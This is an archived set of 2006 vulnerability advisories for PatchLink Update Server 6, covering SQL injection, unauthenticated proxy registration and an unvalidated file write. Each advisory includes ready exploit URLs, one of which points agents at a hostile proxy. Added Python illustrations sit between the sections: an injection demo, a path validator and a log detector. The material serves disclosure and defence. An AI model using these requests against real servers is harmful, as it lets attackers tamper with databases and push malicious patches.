patchlink6.txt

2006-07-02T00:00:00
ID PACKETSTORM:47908
Type packetstorm
Reporter Chris Steipp
Modified 2006-07-02T00:00:00

Description

-------------------------------------------------------------  
PatchLink Update Server 6 SQL Injection  
-------------------------------------------------------------  
Severity: Critical  
Date: June 28, 2006  
Class: Remote  
Status: Patch Available  
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)  
-------------------------------------------------------------  
  
Synopsis  
=====  
Novacoast has discovered a vulnerability in the PatchLink Update Server (PLUS). This could allow the attacker to execute SQL statements in the PatchLink database as DBO.
  
Background  
======  
  
PatchLink Update* is the core product of the leading patch and vulnerability management solution for medium and large enterprise networks.
  
Discussion  
======  
  
There is an SQL injection vulnerability in the checkprofile.asp script. This unauthenticated script uses posted variables in an SQL call, which can be exploited.
  
An unchecked, posted variable (agentid) is used to create an SQL statement. The statement is run as “PLUS ANONYMOUS” (who is a member of PLUS ADMINS, and the PLUS ADMINS group is dbo on the PLUS database). Thus the database can be manipulated as DBO via this attack.
  
Affected Version  
=========  
  
PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1  
Novell ZENworks Patch Management 6.2. SR1  
  
Exploit  
====  
  
None required.  
  
The example exploit given here will write the string “something” into the ReportErrors table:

http://plus.company.org/dagent/checkprofile.asp?agentid=11111';%20INSERT%20INTO%20ReportErrors%20(ReportError_Description)%20VALUES%20('something')--
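Added illustration, not part of this advisory and not PatchLink's code: a Python/sqlite3 stand-in for the checkprofile.asp lookup. The table layout, the agent row and the function names are constructed. check_profile_unsafe pastes agentid into the statement text the way the advisory describes, so the advisory's own payload inserts a row into ReportErrors; check_profile_safe binds the identical value as a parameter and inserts nothing.

```python
import sqlite3

# Constructed stand-in for the PLUS schema: only the two tables the advisory
# names, with one agent row. Not the real PatchLink schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Agents (agentid TEXT PRIMARY KEY, name TEXT);
        CREATE TABLE ReportErrors (ReportError_Description TEXT);
        INSERT INTO Agents VALUES ('11111', 'workstation-01');
    """)
    return conn

# The advisory's payload, URL-decoded.
PAYLOAD = ("11111'; INSERT INTO ReportErrors (ReportError_Description) "
           "VALUES ('something')--")

def check_profile_unsafe(conn, agentid):
    # The pattern the advisory describes: the posted value is pasted into the
    # statement text, so a quote closes the literal and a second statement
    # follows it. executescript runs the text as a batch, as the real server
    # would, and discards the SELECT's rows.
    conn.executescript(f"SELECT name FROM Agents WHERE agentid = '{agentid}'")

def check_profile_safe(conn, agentid):
    # Hardened form: the value is bound as a parameter and is never parsed as
    # SQL, whatever characters it contains.
    row = conn.execute("SELECT name FROM Agents WHERE agentid = ?",
                       (agentid,)).fetchone()
    return row[0] if row else None

def report_error_count(conn):
    return conn.execute("SELECT COUNT(*) FROM ReportErrors").fetchone()[0]

def demo():
    # Returns the ReportErrors row count before, after the unsafe lookup and
    # after the safe lookup: the unsafe call adds the 'something' row, the
    # safe call with the identical input adds nothing.
    conn = make_db()
    before = report_error_count(conn)
    check_profile_unsafe(conn, PAYLOAD)
    after_unsafe = report_error_count(conn)
    check_profile_safe(conn, PAYLOAD)
    after_safe = report_error_count(conn)
    return before, after_unsafe, after_safe

if __name__ == "__main__":
    print(demo())
```

The same separation applies in classic ASP with ADO: a parameterized Command object instead of string concatenation into the query text, which is what the vendor patch must achieve for this script.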
  
Recommended Solution  
=============  
  
Apply Vendor Patch  
PatchLink:  
PatchLink Update Server (PLUS) for 6.2 SR1 P1  
PatchLink Update Server (PLUS) for 6.1 P1  
Novell:   
  
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm  
  
Disclaimer  
======  
Novacoast accepts no liability or responsibility for the  
content of this report, or for the consequences of any  
actions taken on the basis of the information provided  
within. Dissemination of this information is granted  
provided it is presented in its entirety. Modifications  
may not be made without the explicit permission of  
Novacoast.  
  
  
  
  
-------------------------------------------------------------  
PatchLink Update Server 6 PDP Anonymous Access  
-------------------------------------------------------------  
Severity: Medium  
Date: June 28, 2006  
Class: Remote  
Status: Patch Available  
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)  
-------------------------------------------------------------  
  
Synopsis  
=====  
  
Novacoast has discovered a vulnerability in the PatchLink Update Server (PLUS) Distribution Point Server Listing for PatchLink's FastPatch application. Exploitation of this vulnerability could allow the attacker to proxy requests by PatchLink Update Agents for patches, and thus possibly inject arbitrary packages into the PatchLink environment.
  
Background  
======  
  
PatchLink Update* is the core product of the leading patch and vulnerability management solution for medium and large enterprise networks.

PatchLink Distribution Point and FastPatch technology provide intelligent distribution across the entire enterprise minimizing deployment speeds and bandwidth utilization across the wide area network.
  
Discussion  
======  
  
The ASP page “proxyreg.asp” does not properly authenticate credentials when accessed. The “proxyreg.asp” page appears to be used by the PatchLink FastPatch software, which allows roaming PatchLink agents to identify proxy servers on their network and connect to the closest or fastest PatchLink Distribution Point (PDP) automatically. The ASP page returns a list of PDP servers in the organization's environment. An unauthenticated user can list, add, and remove PDP servers from this list.
  
This vulnerability would only affect organizations that use the FastPatch add-on product. Organizations that use SSL to protect their agent-to-PLUS communication will be unaffected by this attack.
  
Affected Version  
=========  
  
PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1  
Novell ZENworks Patch Management 6.2. SR1  
  
Exploit  
====  
  
None required.  
  
1) To list all Proxy servers use:  
  
http://plus.company.org/dagent/proxyreg.asp?List=  
  
Use username/password of null/null for authentication.  
  
2) To add a new Proxy server, use:  
  
http://plus.company.org/dagent/proxyreg.asp?Proxy=www.hostileproxy.com:1337  
  
3) To delete a Proxy server, use:  
  
http://plus.company.org/dagent/proxyreg.asp?Delete=pdp1.company.org  
  
  
Recommended Solution  
=============  
  
1) Apply Vendor Patch  
PatchLink:  
PatchLink Update Server (PLUS) for 6.2 SR1 P1  
PatchLink Update Server (PLUS) for 6.1 P1  
Novell:   
  
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm  
  
2) Workaround  
Deploy SSL certificate authentication to secure traffic between agents and PLUS.
  
  
Disclaimer  
======  
Novacoast accepts no liability or responsibility for the  
content of this report, or for the consequences of any  
actions taken on the basis of the information provided  
within. Dissemination of this information is granted  
provided it is presented in its entirety. Modifications  
may not be made without the explicit permission of  
Novacoast.  
  
  
  
  
-------------------------------------------------------------  
PatchLink Update Server 6 File Overwrite  
-------------------------------------------------------------  
Severity: Medium  
Date: June 28, 2006  
Class: Remote  
Status: Patch Available  
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)  
-------------------------------------------------------------  
  
Synopsis  
=====  
Novacoast has discovered a vulnerability in the PatchLink Update Server (PLUS). This could allow the attacker to write or overwrite files on the PLUS filesystem.
  
Background  
======  
  
PatchLink Update* is the core product of the leading patch and vulnerability management solution for medium and large enterprise networks.
  
Discussion  
======  
  
The application “nwupload.asp” allows unauthenticated connections, and performs file writes for the requester as the user “PLUS ANONYMOUS” (who is a member of the "PLUS ADMINS" Windows group by default). No validation checks are performed to prevent directory traversal.
  
The application nwupload.asp writes a file into directories defined by variables passed to the page, appended to a registry key value. By default, on a Windows 2003 server, the registry key points to: “C:\Program Files\Patchlink\Update Server\Storage”. Since directory traversals are not checked for, it is possible to write to any folder on the PLUS that PLUS ANONYMOUS (or thus, the PLUS ADMINS group) has access to.
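Added illustration, not code from PatchLink's nwupload.asp: how a path built from the action, agentid and index variables should be validated before any delete or write happens. The storage root constant mirrors the Windows 2003 default the advisory quotes; resolve_upload_path and is_within_root are hypothetical names. Each request variable is held to a single-segment allowlist first, and the assembled path is then re-checked to lie under the root using Windows path semantics (ntpath), so the check behaves the same on any host.

```python
import ntpath
import re

# Default storage root the advisory quotes for Windows 2003. On the real
# server this comes from a registry key; here it is a constant.
STORAGE_ROOT = r"C:\Program Files\Patchlink\Update Server\Storage"

# Allowlist for request variables that become path components: one plain
# segment, so separators, drive letters and ".." can never get in.
SEGMENT = re.compile(r"[A-Za-z0-9_-]{1,64}")
INDEX = re.compile(r"[0-9]{1,9}")

def is_within_root(root, candidate):
    """True if candidate normalizes to a path strictly below root.

    Uses Windows path semantics (ntpath) regardless of host OS, so '..',
    forward slashes and case differences are all resolved before comparing.
    """
    root_n = ntpath.normcase(ntpath.normpath(root)).rstrip("\\")
    cand_n = ntpath.normcase(ntpath.normpath(candidate))
    return cand_n.startswith(root_n + "\\")

def resolve_upload_path(action, agentid, index, root=STORAGE_ROOT):
    """Build {root}\\{action}\\{agentid}\\{index}.txt or raise ValueError.

    Hypothetical replacement for the unchecked path construction the advisory
    describes: allowlist each variable first, then re-check the assembled
    path against the root as defence in depth.
    """
    for name, value in (("action", action), ("agentid", agentid)):
        if not SEGMENT.fullmatch(value):
            raise ValueError(f"{name} is not a plain path segment: {value!r}")
    if not INDEX.fullmatch(str(index)):
        raise ValueError(f"index is not a small non-negative integer: {index!r}")
    candidate = ntpath.join(root, action, agentid, f"{int(index)}.txt")
    if not is_within_root(root, candidate):
        raise ValueError("resolved path escapes the storage root")
    return candidate

if __name__ == "__main__":
    print(resolve_upload_path("one", "two", "1"))
    for bad in (("..", "two", "1"), ("one", r"..\..\x", "1"), ("one", "two", "../1")):
        try:
            resolve_upload_path(*bad)
        except ValueError as e:
            print("rejected:", e)
```

The allowlist alone already rejects every traversal form, so the containment check only matters if a later change relaxes the allowlist; keeping both means a single mistake does not reopen the write-anywhere condition the advisory describes.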
  
Affected Version  
=========  
  
PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1  
Novell ZENworks Patch Management 6.2. SR1  
  
Exploit  
====  
  
None required.  
  
1) An attacker can run:  
  
http://plus.company.org/dagent/nwupload.asp?action=one&agentid=two&data=thisiscool&index=1
  
This will first delete the folder at:  
{regkey for storage directory}\one\two  
  
then create the directory:  
{regkey for storage directory}\one\two  
  
then write the file:  
{regkey for storage directory}\one\two\1.txt  
  
The file 1.txt will have the contents of the "data" variable.  
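Added illustration covering all three advisories on this page, not part of the original text: a detector run over constructed IIS W3C-style log lines (date, time, method, URI stem, query, client IP, status) that flags the request shapes described above: SQL metacharacters in checkprofile.asp's agentid, add or delete operations against proxyreg.asp, and parent-directory or separator characters in nwupload.asp's path-forming variables. The log lines, IP addresses and rule names are constructed.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines (not from any real PLUS server). The
# fields are a subset of IIS's extended log format, one record per line.
FIELDS = ["date", "time", "cs-method", "cs-uri-stem", "cs-uri-query",
          "c-ip", "sc-status"]

SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2006-06-28 10:00:01 GET /dagent/checkprofile.asp agentid=11111 10.0.0.5 200
2006-06-28 10:00:02 GET /dagent/checkprofile.asp agentid=11111';%20INSERT%20INTO%20ReportErrors%20(ReportError_Description)%20VALUES%20('something')-- 10.0.0.99 200
2006-06-28 10:00:03 GET /dagent/proxyreg.asp List= 10.0.0.5 200
2006-06-28 10:00:04 GET /dagent/proxyreg.asp Proxy=www.hostileproxy.com:1337 10.0.0.99 200
2006-06-28 10:00:05 GET /dagent/proxyreg.asp Delete=pdp1.company.org 10.0.0.99 200
2006-06-28 10:00:06 GET /dagent/nwupload.asp action=one&agentid=two&data=thisiscool&index=1 10.0.0.5 200
2006-06-28 10:00:07 GET /dagent/nwupload.asp action=..%5C..%5Csomedir&agentid=two&data=x&index=1 10.0.0.99 200
"""

# Quote, semicolon or comment marker inside a value that should be an agent id.
SQL_META = re.compile(r"['\";]|--")
# Parent-directory reference or any path separator / drive colon.
TRAVERSAL = re.compile(r"\.\.|[\\/:]")

def parse_line(line):
    parts = line.split(" ")
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

def classify(rec):
    """Return the rule names a single parsed record triggers."""
    stem = rec["cs-uri-stem"].lower()
    # parse_qs percent-decodes the values; ASP reads query names
    # case-insensitively, so the keys are lower-cased here as well.
    query = {k.lower(): v for k, v in
             parse_qs(rec["cs-uri-query"], keep_blank_values=True).items()}
    hits = []
    if stem.endswith("/dagent/checkprofile.asp"):
        if any(SQL_META.search(v) for v in query.get("agentid", [])):
            hits.append("checkprofile-sqli-metachar")
    elif stem.endswith("/dagent/proxyreg.asp"):
        if "proxy" in query:
            hits.append("proxyreg-add")
        if "delete" in query:
            hits.append("proxyreg-delete")
    elif stem.endswith("/dagent/nwupload.asp"):
        for key in ("action", "agentid"):
            if any(TRAVERSAL.search(v) for v in query.get(key, [])):
                hits.append(f"nwupload-traversal:{key}")
    return hits

def scan(log_text):
    """Return a list of (line number, client IP, rule) for every flagged record."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in classify(rec):
            findings.append((n, rec["c-ip"], rule))
    return findings

if __name__ == "__main__":
    for n, ip, rule in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} {rule}")
```

The proxyreg rules fire on every add or delete, because until the patch is applied none of them is authenticated; after patching, the same rules still give a useful audit trail of PDP list changes, and a client IP that is not a known PLUS administrator or agent is the thing to look at first.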
  
Recommended Solution  
=============  
  
Apply Vendor Patch  
PatchLink:  
PatchLink Update Server (PLUS) for 6.2 SR1 P1  
PatchLink Update Server (PLUS) for 6.1 P1  
Novell:   
  
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm  
  
Disclaimer  
======  
Novacoast accepts no liability or responsibility for the  
content of this report, or for the consequences of any  
actions taken on the basis of the information provided  
within. Dissemination of this information is granted  
provided it is presented in its entirety. Modifications  
may not be made without the explicit permission of  
Novacoast.  
  